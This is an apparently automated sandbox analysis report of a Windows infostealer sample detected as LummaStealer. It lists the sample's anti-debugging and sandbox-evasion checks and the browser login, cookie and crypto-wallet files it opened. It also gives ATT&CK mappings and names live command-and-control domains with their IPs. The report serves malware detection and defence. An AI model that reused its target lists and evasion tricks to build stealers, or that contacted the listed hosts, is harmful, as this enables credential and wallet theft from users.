              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370A85 second address: 5370A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370A98 second address: 5370A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370A9E second address: 5370AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370AD4 second address: 5370B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8E8511F5DFh 0x00000009 sbb ax, 21DEh 0x0000000e jmp 00007F8E8511F5E9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F8E8511F5E0h 0x0000001a or si, 19D8h 0x0000001f jmp 00007F8E8511F5DBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 cmp dword ptr [ebp-04h], 00000000h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f call 00007F8E8511F5DBh 0x00000034 pop eax 0x00000035 mov ebx, 4C409F4Ch 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370B44 second address: 5370B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8E84B4EF87h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370C11 second address: 5360008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F8E8511F5DDh 0x00000011 leave 0x00000012 jmp 00007F8E8511F5DEh 0x00000017 retn 0004h 0x0000001a nop 0x0000001b sub esp, 04h 0x0000001e xor ebx, ebx 0x00000020 cmp eax, 00000000h 0x00000023 je 00007F8E8511F73Fh 0x00000029 mov dword ptr [esp], 0000000Dh 0x00000030 call 00007F8E896E0695h 0x00000035 mov edi, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5360008 second address: 5360020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5360020 second address: 5360026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5360026 second address: 536002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 536002A second address: 5360066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d mov si, EA47h 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 push ecx 0x00000019 mov di, 1836h 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8E8511F5E9h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5360066 second address: 53600B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c jmp 00007F8E84B4EF7Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov ecx, 095BEFCDh 0x00000018 mov ah, BBh 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e mov bx, cx 0x00000021 popad 0x00000022 call 00007F8E84B4EF83h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53600B2 second address: 53600F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 pushad 0x00000008 mov ebx, 58724706h 0x0000000d mov ecx, edx 0x0000000f popad 0x00000010 push esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F8E8511F5DBh 0x0000001a and ax, 8D8Eh 0x0000001f jmp 00007F8E8511F5E9h 0x00000024 popfd 0x00000025 mov ebx, ecx 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5360194 second address: 53601A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E84B4EF7Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53601A6 second address: 5360246 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c jmp 00007F8E8511F5E6h 0x00000011 test al, al 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F8E8511F5DEh 0x0000001a or cx, 9E48h 0x0000001f jmp 00007F8E8511F5DBh 0x00000024 popfd 0x00000025 call 00007F8E8511F5E8h 0x0000002a jmp 00007F8E8511F5E2h 0x0000002f pop esi 0x00000030 popad 0x00000031 je 00007F8E8511F72Bh 0x00000037 jmp 00007F8E8511F5E1h 0x0000003c lea ecx, dword ptr [ebp-14h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F8E8511F5DDh 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53602B1 second address: 53602B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53602B5 second address: 53602BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53602BB second address: 53602C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53602C1 second address: 53602C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53602C5 second address: 53602EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8E84B4EF7Dh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8E84B4EF7Dh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53603B7 second address: 5360433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F8E8511F5DBh 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 jmp 00007F8E8511F5E4h 0x00000017 mov ax, 45B1h 0x0000001b popad 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F8E8511F5E9h 0x00000026 and si, 4BF6h 0x0000002b jmp 00007F8E8511F5E1h 0x00000030 popfd 0x00000031 mov edx, ecx 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5360433 second address: 5360439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5360439 second address: 5360465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8E8511F5E4h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5360465 second address: 5360477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E84B4EF7Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5360477 second address: 53604DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F8E8511F5E7h 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 jmp 00007F8E8511F5E4h 0x00000015 pushfd 0x00000016 jmp 00007F8E8511F5E2h 0x0000001b adc cl, 00000068h 0x0000001e jmp 00007F8E8511F5DBh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov eax, 742156F1h 0x0000002e movzx esi, dx 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53604DD second address: 53604E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53604E3 second address: 536052E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d call 00007F8E8511F5DEh 0x00000012 movzx eax, di 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F8E8511F5DAh 0x0000001e xor esi, 75E93358h 0x00000024 jmp 00007F8E8511F5DBh 0x00000029 popfd 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exe Special instruction interceptor: First address: DC59F6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\FvbuInU.exe Special instruction interceptor: First address: F6197A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\FvbuInU.exe Special instruction interceptor: First address: DC5923 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\FvbuInU.exe Special instruction interceptor: First address: FF0923 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\FvbuInU.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\FvbuInU.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\FvbuInU.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\FvbuInU.exe Code function: 0_2_00DC90A0 rdtsc 0_2_00DC90A0
              Source: C:\Users\user\Desktop\FvbuInU.exe Window / User API: threadDelayed 1237
              Source: C:\Users\user\Desktop\FvbuInU.exe Window / User API: threadDelayed 1488
              Source: C:\Users\user\Desktop\FvbuInU.exe Window / User API: threadDelayed 1398
              Source: C:\Users\user\Desktop\FvbuInU.exe Window / User API: threadDelayed 1414
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7628 Thread sleep count: 77 > 30
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7628 Thread sleep time: -154077s >= -30000s
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7612 Thread sleep count: 1237 > 30
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7612 Thread sleep time: -2475237s >= -30000s
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7704 Thread sleep time: -44000s >= -30000s
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7600 Thread sleep count: 1488 > 30
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7600 Thread sleep time: -2977488s >= -30000s
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7708 Thread sleep time: -180000s >= -30000s
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7620 Thread sleep count: 1398 > 30
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7620 Thread sleep time: -2797398s >= -30000s
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7608 Thread sleep count: 1414 > 30
              Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7608 Thread sleep time: -2829414s >= -30000s
              Source: C:\Users\user\Desktop\FvbuInU.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: FvbuInU.exe, FvbuInU.exe, 00000000.00000002.1967709677.0000000000F44000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1771684448.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000002.1968657019.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967345625.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000002.1968513015.0000000001537000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967231255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1853538978.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001537000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: FvbuInU.exe, 00000000.00000002.1967709677.0000000000F44000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\FvbuInU.exe System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\FvbuInU.exe Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\FvbuInU.exe Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\FvbuInU.exe Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\FvbuInU.exe Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\FvbuInU.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\FvbuInU.exe Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\FvbuInU.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\FvbuInU.exe Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\FvbuInU.exe Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\FvbuInU.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\FvbuInU.exe File opened: NTICE
              Source: C:\Users\user\Desktop\FvbuInU.exe File opened: SICE
              Source: C:\Users\user\Desktop\FvbuInU.exe File opened: SIWVID
              Source: C:\Users\user\Desktop\FvbuInU.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\FvbuInU.exe Code function: 0_2_00DC90A0 rdtsc 0_2_00DC90A0
              Source: C:\Users\user\Desktop\FvbuInU.exe Code function: 0_2_00DA9660 LdrInitializeThunk,0_2_00DA9660
              Source: FvbuInU.exe, FvbuInU.exe, 00000000.00000002.1967709677.0000000000F44000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: OF/Program Manager
              Source: C:\Users\user\Desktop\FvbuInU.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\FvbuInU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: FvbuInU.exe, 00000000.00000003.1772640592.000000000156C000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1772740310.00000000015C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\FvbuInU.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match; File source: Process Memory Space: FvbuInU.exe PID: 7544, type: MEMORYSTR
              Source: Yara match; File source: 0.2.FvbuInU.exe.d60000.0.unpack, type: UNPACKEDPE
              Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %appdata%\Electrum\wallets
              Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %appdata%\ElectronCash\wallets
              Source: FvbuInU.exe, 00000000.00000003.1531596694.00000000015EB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Jaxx Libertyed
              Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: window-state.json
              Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: FvbuInU.exe, 00000000.00000003.1468199421.0000000005C81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: ExodusWeb3
              Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %appdata%\Ethereum
              Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\FvbuInU.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\FvbuInU.exe; Directory queried: C:\Users\user\Documents\CURQNKVOIX
              Source: C:\Users\user\Desktop\FvbuInU.exe; Directory queried: C:\Users\user\Documents\DUUDTUBZFW
              Source: Yara match; File source: 00000000.00000003.1531650734.0000000001590000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000000.00000003.1531596694.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: FvbuInU.exe PID: 7544, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match; File source: Process Memory Space: FvbuInU.exe PID: 7544, type: MEMORYSTR
              Source: Yara match; File source: 0.2.FvbuInU.exe.d60000.0.unpack, type: UNPACKEDPE
              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
              Execution: 12 Windows Management Instrumentation; 2 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task
              Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Defense Evasion: 44 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
              Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
              Discovery: 861 Security Software Discovery; 44 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 File and Directory Discovery; 223 System Information Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
              Collection: 1 Archive Collected Data; 31 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
              Command and Control: 21 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

              Source | Detection | Scanner | Label | Link
              FvbuInU.exe | 76% | Virustotal | | Browse
              FvbuInU.exe | 76% | ReversingLabs | Win32.Trojan.LummaStealer |
              FvbuInU.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://nebdulaq.digital/aQwdw) | 0% | Avira URL Cloud | safe |
              https://nebdulaq.digital/aQwdw% | 0% | Avira URL Cloud | safe |
              https://nebdulaq.digital:443/aQwdwmartFTP | 0% | Avira URL Cloud | safe |
              https://begindecafer.world/QwdZdf | 100% | Avira URL Cloud | malware |
              https://nebdulaq.digital/ | 0% | Avira URL Cloud | safe |
              https://nebdulaq.digital/aQwdw$ | 0% | Avira URL Cloud | safe |
              https://nebdulaq.digital/aQwdw | 0% | Avira URL Cloud | safe |
              https://nebdulaq.digital:443/aQwdw | 0% | Avira URL Cloud | safe |
              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | 0% | Avira URL Cloud | safe |
              https://nebdulaq.digital/aQwdw2 | 0% | Avira URL Cloud | safe |
              https://begindecafer.world/QwdZdfU | 100% | Avira URL Cloud | malware |
              https://begindecafer.world/ | 100% | Avira URL Cloud | malware |
              https://nebdulaq.digital/aQwdw? | 0% | Avira URL Cloud | safe |
              https://begindecafer.world:443/QwdZdflt-release/key4.dbPK | 100% | Avira URL Cloud | malware |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              begindecafer.world | 188.114.96.3 | true | true | | unknown
              nebdulaq.digital | 104.21.53.52 | true | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              https://begindecafer.world/QwdZdf | false | Avira URL Cloud: malware | unknown
              https://nebdulaq.digital/aQwdw | false | Avira URL Cloud: safe | unknown
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgFvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brFvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://nebdulaq.digital/aQwdw?FvbuInU.exe, 00000000.00000003.1468276097.00000000015F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.com/images/branding/product/ico/googleg_alldp.icoFvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.ecosia.org/newtab/v20FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
